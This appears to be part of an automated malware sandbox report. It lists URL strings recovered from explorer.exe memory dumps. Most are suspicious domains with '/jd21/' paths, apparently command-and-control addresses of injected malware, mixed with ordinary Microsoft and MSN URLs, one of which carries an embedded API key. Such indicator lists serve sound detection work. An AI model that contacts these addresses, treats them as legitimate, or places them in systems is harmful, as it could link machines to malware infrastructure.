Source: explorer.exe, 00000004.00000002.2355563195.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285121110.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2698810069.000000000C158000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.authentication-app-69447.bond/jd21/
Source: explorer.exe, 00000004.00000002.2355563195.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285121110.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.authentication-app-69447.bond/jd21/www.borghardt.xyz
Source: explorer.exe, 00000015.00000002.2698810069.000000000C158000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.authentication-app-69447.bond/jd21/www.cellphonesfxw.today
Source: explorer.exe, 00000004.00000002.2355563195.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285121110.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2698810069.000000000C158000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.authentication-app-69447.bondReferer:
Source: explorer.exe, 00000004.00000002.2355563195.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285121110.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.badcreditloans59.xyz
Source: explorer.exe, 00000004.00000003.2285121110.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.badcreditloans59.xyz/jd21/
Source: explorer.exe, 00000004.00000002.2355563195.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285121110.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.badcreditloans59.xyzReferer:
Source: explorer.exe, 00000004.00000002.2355563195.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285121110.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.borghardt.xyz
Source: explorer.exe, 00000004.00000002.2355563195.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285121110.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.borghardt.xyz/jd21/
Source: explorer.exe, 00000004.00000002.2355563195.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285121110.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.borghardt.xyz/jd21/www.weight-loss-003.today
Source: explorer.exe, 00000004.00000002.2355563195.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285121110.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.borghardt.xyzReferer:
Source: explorer.exe, 00000015.00000002.2698810069.000000000C158000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.cellphonesfxw.today
Source: explorer.exe, 00000015.00000002.2698810069.000000000C158000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.cellphonesfxw.today/jd21/
Source: explorer.exe, 00000015.00000002.2698810069.000000000C158000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.cellphonesfxw.today/jd21/www.pools-99305.bond
Source: explorer.exe, 00000015.00000002.2698810069.000000000C158000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.cellphonesfxw.todayReferer:
Source: explorer.exe, 00000015.00000002.2698810069.000000000C158000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.circusenergy.online
Source: explorer.exe, 00000015.00000002.2698810069.000000000C158000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.circusenergy.online/jd21/
Source: explorer.exe, 00000015.00000002.2698810069.000000000C158000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.circusenergy.online/jd21/www.forklift-jobs-29768.bond
Source: explorer.exe, 00000015.00000002.2698810069.000000000C158000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.circusenergy.onlineReferer:
Source: explorer.exe, 00000004.00000002.2355563195.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285121110.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.dating-dd-de.info
Source: explorer.exe, 00000004.00000002.2355563195.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285121110.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.dating-dd-de.info/jd21/
Source: explorer.exe, 00000004.00000002.2355563195.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285121110.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.dating-dd-de.info/jd21/www.mvtb.pics
Source: explorer.exe, 00000004.00000002.2355563195.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285121110.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.dating-dd-de.infoReferer:
Source: explorer.exe, 00000004.00000002.2355563195.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285121110.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.emiratesnseic.top
Source: explorer.exe, 00000004.00000002.2355563195.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285121110.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.emiratesnseic.top/jd21/
Source: explorer.exe, 00000004.00000002.2355563195.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285121110.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.emiratesnseic.top/jd21/www.030002787.xyz
Source: explorer.exe, 00000004.00000002.2355563195.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285121110.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.emiratesnseic.topReferer:
Source: explorer.exe, 00000015.00000002.2698810069.000000000C158000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.forklift-jobs-29768.bond
Source: explorer.exe, 00000015.00000002.2698810069.000000000C158000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.forklift-jobs-29768.bond/jd21/
Source: explorer.exe, 00000015.00000002.2698810069.000000000C158000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.forklift-jobs-29768.bond/jd21/www.tyumk.xyz
Source: explorer.exe, 00000015.00000002.2698810069.000000000C158000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.forklift-jobs-29768.bondReferer:
Source: explorer.exe, 00000004.00000002.2355563195.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285121110.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.frametoryframes.shop
Source: explorer.exe, 00000004.00000002.2355563195.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285121110.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.frametoryframes.shop/jd21/
Source: explorer.exe, 00000004.00000002.2355563195.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285121110.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.frametoryframes.shop/jd21/www.dating-dd-de.info
Source: explorer.exe, 00000004.00000002.2355563195.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285121110.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.frametoryframes.shopReferer:
Source: explorer.exe, 00000015.00000002.2698810069.000000000C158000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.gkbet168.net
Source: explorer.exe, 00000015.00000002.2698810069.000000000C158000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.gkbet168.net/jd21/
Source: explorer.exe, 00000015.00000002.2698810069.000000000C158000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.gkbet168.net/jd21/www.sctttc-or.top
Source: explorer.exe, 00000015.00000002.2698810069.000000000C158000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.gkbet168.netReferer:
Source: explorer.exe, 00000015.00000002.2698810069.000000000C158000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.hm23s.top
Source: explorer.exe, 00000015.00000002.2698810069.000000000C158000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.hm23s.top/jd21/
Source: explorer.exe, 00000015.00000002.2698810069.000000000C158000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.hm23s.top/jd21/www.alqahtani.site
Source: explorer.exe, 00000015.00000002.2698810069.000000000C158000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.hm23s.topReferer:
Source: explorer.exe, 00000004.00000002.2355563195.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285121110.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.joycasino-ed46.top
Source: explorer.exe, 00000004.00000002.2355563195.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285121110.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.joycasino-ed46.top/jd21/
Source: explorer.exe, 00000004.00000002.2355563195.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285121110.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.joycasino-ed46.top/jd21/www.xmld101.icu
Source: explorer.exe, 00000004.00000002.2355563195.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285121110.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.joycasino-ed46.topReferer:
Source: explorer.exe, 00000015.00000002.2698810069.000000000C158000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.mahlubini.africa
Source: explorer.exe, 00000015.00000002.2698810069.000000000C158000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.mahlubini.africa/jd21/
Source: explorer.exe, 00000015.00000002.2698810069.000000000C158000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.mahlubini.africa/jd21/www.weight-loss-003.today
Source: explorer.exe, 00000015.00000002.2698810069.000000000C158000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.mahlubini.africaReferer:
Source: explorer.exe, 00000015.00000003.2419145359.000000000C102000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.
Source: explorer.exe, 00000004.00000000.1457725429.0000000009237000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2346753313.0000000009237000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2284163975.0000000009237000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.c
Source: explorer.exe, 00000004.00000002.2355563195.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285121110.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2698810069.000000000C158000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.mvtb.pics
Source: explorer.exe, 00000004.00000002.2355563195.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285121110.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2698810069.000000000C158000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.mvtb.pics/jd21/
Source: explorer.exe, 00000004.00000002.2355563195.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285121110.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.mvtb.pics/jd21/www.2002w.app
Source: explorer.exe, 00000015.00000002.2698810069.000000000C158000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.mvtb.pics/jd21/www.apple0ficial-ld.info
Source: explorer.exe, 00000004.00000002.2355563195.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285121110.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2698810069.000000000C158000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.mvtb.picsReferer:
Source: explorer.exe, 00000004.00000002.2355563195.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285121110.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.nextdoor3.store
Source: explorer.exe, 00000004.00000002.2355563195.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285121110.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.nextdoor3.store/jd21/
Source: explorer.exe, 00000004.00000002.2355563195.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285121110.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.nextdoor3.store/jd21/www.frametoryframes.shop
Source: explorer.exe, 00000004.00000002.2355563195.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285121110.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.nextdoor3.storeReferer:
Source: explorer.exe, 00000015.00000002.2698810069.000000000C158000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.pools-99305.bond
Source: explorer.exe, 00000015.00000002.2698810069.000000000C158000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.pools-99305.bond/jd21/
Source: explorer.exe, 00000015.00000002.2698810069.000000000C158000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.pools-99305.bond/jd21/www.gkbet168.net
Source: explorer.exe, 00000015.00000002.2698810069.000000000C158000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.pools-99305.bondReferer:
Source: explorer.exe, 00000004.00000002.2355563195.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285121110.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.propertiesforrentus11.bond
Source: explorer.exe, 00000004.00000002.2355563195.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285121110.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.propertiesforrentus11.bond/jd21/
Source: explorer.exe, 00000004.00000002.2355563195.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285121110.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.propertiesforrentus11.bond/jd21/www.tyumk.xyz
Source: explorer.exe, 00000004.00000002.2355563195.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285121110.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.propertiesforrentus11.bondReferer:
Source: explorer.exe, 00000015.00000002.2698810069.000000000C158000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.sctttc-or.top
Source: explorer.exe, 00000015.00000002.2698810069.000000000C158000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.sctttc-or.top/jd21/
Source: explorer.exe, 00000015.00000002.2698810069.000000000C158000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.sctttc-or.top/jd21/www.solveiterzsolutions.fun
Source: explorer.exe, 00000015.00000002.2698810069.000000000C158000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.sctttc-or.topReferer:
Source: explorer.exe, 00000015.00000002.2698810069.000000000C158000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.solveiterzsolutions.fun
Source: explorer.exe, 00000015.00000002.2698810069.000000000C158000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.solveiterzsolutions.fun/jd21/
Source: explorer.exe, 00000015.00000002.2698810069.000000000C158000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.solveiterzsolutions.fun/jd21/www.mahlubini.africa
Source: explorer.exe, 00000015.00000002.2698810069.000000000C158000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.solveiterzsolutions.funReferer:
Source: explorer.exe, 00000015.00000002.2698810069.000000000C158000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.therealtorpeddler.info
Source: explorer.exe, 00000015.00000002.2698810069.000000000C158000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.therealtorpeddler.info/jd21/
Source: explorer.exe, 00000015.00000002.2698810069.000000000C158000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.therealtorpeddler.info/jd21/www.authentication-app-69447.bond
Source: explorer.exe, 00000015.00000002.2698810069.000000000C158000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.therealtorpeddler.infoReferer:
Source: explorer.exe, 00000004.00000002.2355563195.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285121110.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2698810069.000000000C158000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.tyumk.xyz
Source: explorer.exe, 00000004.00000002.2355563195.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285121110.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2698810069.000000000C158000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.tyumk.xyz/jd21/
Source: explorer.exe, 00000004.00000002.2355563195.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285121110.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.tyumk.xyz/jd21/www.badcreditloans59.xyz
Source: explorer.exe, 00000015.00000002.2698810069.000000000C158000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.tyumk.xyz/jd21/www.therealtorpeddler.info
Source: explorer.exe, 00000004.00000002.2355563195.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285121110.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2698810069.000000000C158000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.tyumk.xyzReferer:
Source: explorer.exe, 00000004.00000002.2355563195.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285121110.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2698810069.000000000C158000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.weight-loss-003.today
Source: explorer.exe, 00000004.00000002.2355563195.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285121110.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2698810069.000000000C158000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.weight-loss-003.today/jd21/
Source: explorer.exe, 00000004.00000002.2355563195.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285121110.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.weight-loss-003.today/jd21/www.emiratesnseic.top
Source: explorer.exe, 00000015.00000002.2698810069.000000000C158000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.weight-loss-003.today/jd21/www.mvtb.pics
Source: explorer.exe, 00000004.00000002.2355563195.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285121110.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2698810069.000000000C158000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.weight-loss-003.todayReferer:
Source: explorer.exe, 00000004.00000002.2355563195.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285121110.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.xmld101.icu
Source: explorer.exe, 00000004.00000002.2355563195.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285121110.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.xmld101.icu/jd21/
Source: explorer.exe, 00000004.00000002.2355563195.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285121110.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.xmld101.icu/jd21/www.nextdoor3.store
Source: explorer.exe, 00000004.00000002.2355563195.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285121110.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.xmld101.icuReferer:
Source: explorer.exe, 00000004.00000000.1464190970.000000000BC80000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2352030315.000000000BCB7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2286095962.000000000BCB4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp
Source: explorer.exe, 00000004.00000002.2355211941.000000000C0FD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppaBg
Source: explorer.exe, 00000004.00000000.1464190970.000000000BC80000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2355211941.000000000C0FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2352030315.000000000BCB7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2286095962.000000000BCB4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOS
Source: explorer.exe, 00000004.00000000.1464190970.000000000BC80000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2352030315.000000000BCB7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2286095962.000000000BCB4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOSA4
Source: explorer.exe, 00000004.00000000.1464190970.000000000BC80000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2352030315.000000000BCB7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2286095962.000000000BCB4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOSd
Source: explorer.exe, 00000004.00000002.2355211941.000000000C0FD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOS~
Source: explorer.exe, 00000004.00000002.2344169455.0000000007046000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1455950786.000000000702D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2286380844.0000000007043000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/
Source: explorer.exe, 00000015.00000002.2691561420.000000000926A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 00000004.00000000.1457725429.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2346753313.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2284163975.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2691561420.0000000009239000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?
Source: explorer.exe, 00000004.00000002.2344169455.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1455950786.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2350390233.00000000075E4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2686276323.00000000075E4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0E948A694F8C48079B908C8EA9DDF9EA&timeOut=5000&oc
Source: explorer.exe, 00000004.00000003.2284163975.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2344169455.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1457725429.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1455950786.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2346753313.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2350390233.00000000075E4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2686276323.00000000075E4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2397384870.000000000926A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2691561420.000000000926A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
Source: explorer.exe, 00000004.00000003.2284163975.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1457725429.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2346753313.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2399125053.0000000007674000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2686276323.0000000007674000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://arc.msn.com
Source: explorer.exe, 00000015.00000002.2686276323.00000000075E4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
Source: explorer.exe, 00000015.00000002.2686276323.00000000075E4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svg
Source: explorer.exe, 00000004.00000002.2344169455.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1455950786.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2350390233.00000000075E4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2686276323.00000000075E4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/recordhigh.svg
Source: explorer.exe, 00000004.00000002.2344169455.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1455950786.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2350390233.00000000075E4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2686276323.00000000075E4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/WeatherInsights/WeatherInsi
Source: explorer.exe, 00000015.00000003.2350390233.00000000075E4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2686276323.00000000075E4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
Source: explorer.exe, 00000015.00000003.2350390233.00000000075E4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2686276323.00000000075E4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
Source: explorer.exe, 00000004.00000002.2344169455.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1455950786.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2350390233.00000000075E4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2686276323.00000000075E4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT
